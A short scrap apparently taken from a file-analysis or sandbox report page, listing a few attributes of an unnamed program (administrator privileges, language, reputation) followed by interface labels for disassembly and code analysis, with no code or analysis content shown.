                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Disassembly

                                                          Code Analysis

                                                          Reset < >